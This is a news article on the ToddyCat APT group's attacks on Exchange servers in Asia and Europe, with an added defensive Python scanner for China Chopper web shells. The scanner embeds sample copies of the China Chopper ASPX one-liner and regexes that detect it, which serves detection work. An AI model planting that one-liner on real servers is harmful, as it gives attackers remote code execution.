Microsoft Exchange Servers Attacked by ToddyCat APT Group to Inject Backdoor

ToddyCat, an APT group first observed more than a year ago, has been compromising Microsoft Exchange servers belonging to organizations across Asia and Europe.

Security researchers at Kaspersky's GReAT, who have been tracking the group's activity, identified two malware families in the course of that work: a previously unknown backdoor and a new trojan. They are:-

  • Samurai (the backdoor)
  • Ninja (the trojan)

Both tools give the attackers remote control of the compromised systems and let them move laterally through the victims' networks.

ESET, a Slovak cybersecurity firm, had also observed ToddyCat's intrusion attempts: in March 2021 it began tracking the activity as a cluster it named Websiic.

In that campaign the attackers exploited the ProxyLogon vulnerabilities in Exchange. The exploit let them deploy the China Chopper web shell on vulnerable servers and gain remote code execution.
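The defensive counterpart to the chain above is hunting for the web shell the exploit drops. The following is an added example, not code from the article or from the Kaspersky or ESET reports: it walks a directory tree standing in for the IIS-served paths of an Exchange server and flags ASPX-type files containing China Chopper's characteristic one-liner (an `eval` of a request parameter with the `"unsafe"` flag). The file paths and contents are constructed for the demonstration; the regexes assume the widely documented JScript form of the shell and a few trivial whitespace and `Request.Form`/`Request.Params` variations, so a heavily obfuscated shell would need further rules.

```python
"""Hunt for China Chopper-style ASPX web shells in a directory tree.

Added example (not from the article or the vendor reports). Sample files
below are constructed; the paths only imitate Exchange's OWA/ECP layout.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional

# China Chopper's ASPX form is a single line that evals a request parameter.
# Allow whitespace between tokens and the common Request.* accessors.
EVAL_REQUEST = re.compile(
    r'eval\s*\(\s*Request\s*\.\s*(?:Item|Form|Params|QueryString)\s*\[',
    re.IGNORECASE,
)
# The "unsafe" second argument is the tell-tale China Chopper signature.
UNSAFE_FLAG = re.compile(r',\s*"unsafe"\s*\)', re.IGNORECASE)

# Extensions IIS will execute as server-side script.
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx")


def classify(text: str) -> Optional[str]:
    """Return a verdict for one file's contents, or None if it looks clean."""
    if not EVAL_REQUEST.search(text):
        return None
    # eval(Request...) alone is already suspicious; with "unsafe" it is the
    # textbook China Chopper dropper.
    return "china_chopper" if UNSAFE_FLAG.search(text) else "eval_of_request"


def scan_tree(root: str) -> Dict[str, str]:
    """Walk `root` and map relative path -> verdict for every flagged file."""
    hits: Dict[str, str] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCRIPT_EXTS):
                continue  # only server-executed script files matter here
            path = os.path.join(dirpath, name)
            try:
                text = Path(path).read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the hunt
            verdict = classify(text)
            if verdict:
                hits[os.path.relpath(path, root)] = verdict
    return hits


# Constructed sample files (hypothetical paths imitating OWA/ECP directories).
SAMPLES = {
    # classic one-line China Chopper shell
    "owa/auth/current/themes/resources/logon.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    # same shell with extra whitespace and Request.Form
    "ecp/auth/help.aspx":
        '<%@ Page Language="Jscript" %>\n<% eval (Request.Form ["k"], "unsafe" ); %>',
    # benign page: no eval of request input
    "owa/auth/logon_legit.aspx":
        '<%@ Page Language="C#" %><html><body>Sign in</body></html>',
    # shell text in a non-script file: IIS will not execute it, so ignored
    "owa/auth/readme.txt":
        'eval(Request.Item["x"],"unsafe")',
}


def build_sample_tree() -> str:
    """Write the constructed samples into a temporary directory and return it."""
    root = tempfile.mkdtemp(prefix="chopper_hunt_")
    for rel, body in SAMPLES.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root


def demo() -> Dict[str, str]:
    """Build the sample tree and scan it; returns the flagged files."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for rel_path, verdict in sorted(demo().items()):
        print(f"{verdict:18} {rel_path}")
```

On a real server the root would be the Exchange installation's FrontEnd and ClientAccess directories, and a hit should be triaged with the file's creation time against the IIS logs for the request that wrote it.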

Attack waves & targets

The group's targets have varied over time, but they are consistently high-profile: government and military entities, or contractors who work with them.

The first wave of attacks, between December 2020 and February 2021, hit a small number of government organizations in:-

  • Vietnam
  • Taiwan

The second wave, between February 2021 and May 2021, quickly grew to include entities from a long list of countries worldwide, including:-

  • Russia
  • India
  • Iran
  • The United Kingdom

The next phase of ToddyCat's expansion kept its focus on the same cluster of countries and added organizations from:-

  • Indonesia
  • Uzbekistan
  • Kyrgyzstan

Activity links with Chinese-speaking APTs

Several Chinese-speaking groups have targeted the same industries and countries as ToddyCat.

Around the same time, some of the same entities were also compromised with the FunnyDream backdoor, a tool associated with Chinese-speaking actors. The affected organizations, governmental and military alike, show that the group is concentrating its efforts on very high-profile targets.

ToddyCat uses a wide range of techniques to stay stealthy and avoid detection for extended periods. Southeast Asia is its primary focus, but its activity also reaches targets elsewhere in Asia and in Europe.


BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.